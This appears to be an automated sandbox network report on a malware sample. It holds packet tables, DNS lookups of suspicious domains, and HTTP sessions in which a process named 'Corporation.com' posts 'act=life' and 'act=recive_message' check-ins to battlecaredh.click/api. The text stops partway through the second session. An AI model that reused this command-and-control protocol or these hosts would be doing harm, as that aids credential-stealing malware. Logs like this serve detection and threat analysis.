                                                                                                                                                  Dec 29, 2024 16:37:23.342602968 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.342618942 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.342659950 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.344727039 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.348486900 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.348503113 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.348545074 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.348562002 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.348579884 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.348597050 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.354047060 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.354523897 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.354538918 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.354597092 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.354609966 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.354651928 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.362771034 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.515275955 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.515294075 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.515353918 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.515386105 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.515439987 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.521025896 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.521039963 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.521107912 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.521131992 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.521173954 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.526253939 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.526267052 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.526343107 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.526365042 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.526406050 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.532326937 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.532341003 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.532418013 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.532444000 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.532485962 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.538244963 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.538261890 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.538325071 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.538347960 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.538394928 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.543976068 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.543989897 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.544053078 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.544074059 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.544112921 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.549912930 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.549928904 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.549990892 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.550008059 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.550045013 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.555185080 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.555200100 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.555262089 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.555282116 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.555327892 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.716299057 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.716316938 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.716491938 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.716521978 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.716583967 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.722379923 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.722393990 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.722455978 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.722481012 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.722528934 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.728317976 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.728332043 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.728400946 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.728424072 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.728471041 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.733599901 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.733618021 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.733691931 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.733711958 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.733757973 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.739964962 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.739979982 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.740051031 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.740072966 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.740115881 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.745260000 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.745274067 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.745341063 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.745359898 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.745408058 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.751305103 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.751322985 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.751390934 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.751409054 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.751452923 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.757241964 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.757256031 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.757322073 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.757342100 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.757378101 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.918010950 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.918030024 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.918073893 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.918106079 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.918123007 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.918149948 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.923945904 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.923970938 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.924015045 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.924034119 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.924048901 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.924071074 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.929997921 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.930012941 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.930058956 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.930080891 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.930119038 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.935297966 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.935311079 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.935353994 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.935370922 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.935385942 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.935405016 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.941658974 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.941673040 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.941719055 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.941735983 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.941772938 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.946933031 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.946947098 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.946999073 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.947016001 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.947053909 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.952897072 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.952912092 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.952965975 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.952982903 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.953025103 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.958949089 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.958965063 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.959019899 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.959038019 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.959078074 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.116585970 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.116652966 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.121166945 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.121181965 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.121236086 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.121262074 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.121301889 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.127146006 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.127161026 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.127218008 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.127243042 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.127266884 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.127283096 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.133095026 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.133109093 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.133151054 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.133173943 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.133191109 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.133209944 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.139151096 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.139166117 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.139225006 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.139247894 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.139283895 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.144805908 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.144819975 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.144856930 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.144875050 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.144892931 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.144912004 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.150052071 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.150067091 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.150114059 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.150140047 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.150177956 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.156100035 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.156114101 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.156155109 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.156177044 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.156193972 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.156209946 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.317857027 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.317877054 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.317958117 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.317985058 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.318022966 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.322603941 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.322618961 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.322691917 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.322710037 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.322762012 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.328649998 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.328664064 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.328730106 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.328747034 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.328783035 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.334587097 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.334599972 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.334660053 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.334676981 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.334714890 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.336426973 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.336483002 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.336494923 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.336513042 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.336550951 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.345491886 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.345515966 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.345554113 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.345561028 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Dec 29, 2024 16:36:31.881633043 CET5705853192.168.2.41.1.1.1
                                                                                                                                                  Dec 29, 2024 16:36:32.134953022 CET53570581.1.1.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:42.197626114 CET6204153192.168.2.41.1.1.1
                                                                                                                                                  Dec 29, 2024 16:36:42.565474987 CET53620411.1.1.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:05.188755989 CET6332253192.168.2.41.1.1.1
                                                                                                                                                  Dec 29, 2024 16:37:06.145196915 CET53633221.1.1.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.133548021 CET6409053192.168.2.41.1.1.1
                                                                                                                                                  Dec 29, 2024 16:37:08.482040882 CET53640901.1.1.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.707575083 CET5232853192.168.2.41.1.1.1
                                                                                                                                                  Dec 29, 2024 16:37:08.940474987 CET53523281.1.1.1192.168.2.4
                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Dec 29, 2024 16:36:31.881633043 CET192.168.2.41.1.1.10x987bStandard query (0)ORvihsqSjYelCBrlwGdYOpK.ORvihsqSjYelCBrlwGdYOpKA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:36:42.197626114 CET192.168.2.41.1.1.10xb6a7Standard query (0)battlecaredh.clickA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:37:05.188755989 CET192.168.2.41.1.1.10xd8e6Standard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:37:08.133548021 CET192.168.2.41.1.1.10x11beStandard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:37:08.707575083 CET192.168.2.41.1.1.10x240cStandard query (0)dfgh.onlineA (IP address)IN (0x0001)false
                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Dec 29, 2024 16:36:32.134953022 CET1.1.1.1192.168.2.40x987bName error (3)ORvihsqSjYelCBrlwGdYOpK.ORvihsqSjYelCBrlwGdYOpKnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:36:42.565474987 CET1.1.1.1192.168.2.40xb6a7No error (0)battlecaredh.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:36:42.565474987 CET1.1.1.1192.168.2.40xb6a7No error (0)battlecaredh.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:36:42.565474987 CET1.1.1.1192.168.2.40xb6a7No error (0)battlecaredh.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:36:42.565474987 CET1.1.1.1192.168.2.40xb6a7No error (0)battlecaredh.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:36:42.565474987 CET1.1.1.1192.168.2.40xb6a7No error (0)battlecaredh.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:36:42.565474987 CET1.1.1.1192.168.2.40xb6a7No error (0)battlecaredh.click104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:36:42.565474987 CET1.1.1.1192.168.2.40xb6a7No error (0)battlecaredh.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:37:06.145196915 CET1.1.1.1192.168.2.40xd8e6No error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:37:08.482040882 CET1.1.1.1192.168.2.40x11beNo error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:37:08.482040882 CET1.1.1.1192.168.2.40x11beNo error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 29, 2024 16:37:08.940474987 CET1.1.1.1192.168.2.40x240cName error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                  • battlecaredh.click
                                                                                                                                                  • cegu.shop
                                                                                                                                                  • klipvumisui.shop
                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.449739104.21.32.14433448C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-29 15:36:43 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 8
                                                                                                                                                  Host: battlecaredh.click
                                                                                                                                                  2024-12-29 15:36:43 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                  2024-12-29 15:36:44 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:44 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=05faokdj4prt8rvfku7udij84s; expires=Thu, 24 Apr 2025 09:23:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZIEYDvsh190lS6JBGoL3J3C4a3ih4jLLWBWBig8NbTp%2Flzl5bUZjM6KIkdVP57Tesf1%2BIQFjbm3Xcs3yUUZvtbyHq3%2BZJApZr58a%2B%2BOnmfDOQRAbvc4acjDBIVWhu7EB3V9iP%2FE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade0bfaad72b9-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1786&rtt_var=893&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4236&recv_bytes=909&delivery_rate=135511&cwnd=214&unsent_bytes=0&cid=b5bf421f60d309aa&ts=764&x=0"
                                                                                                                                                  2024-12-29 15:36:44 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                  2024-12-29 15:36:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.449740104.21.32.14433448C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-29 15:36:45 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 78
                                                                                                                                                  Host: battlecaredh.click
                                                                                                                                                  2024-12-29 15:36:45 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397
                                                                                                                                                  2024-12-29 15:36:46 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:46 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
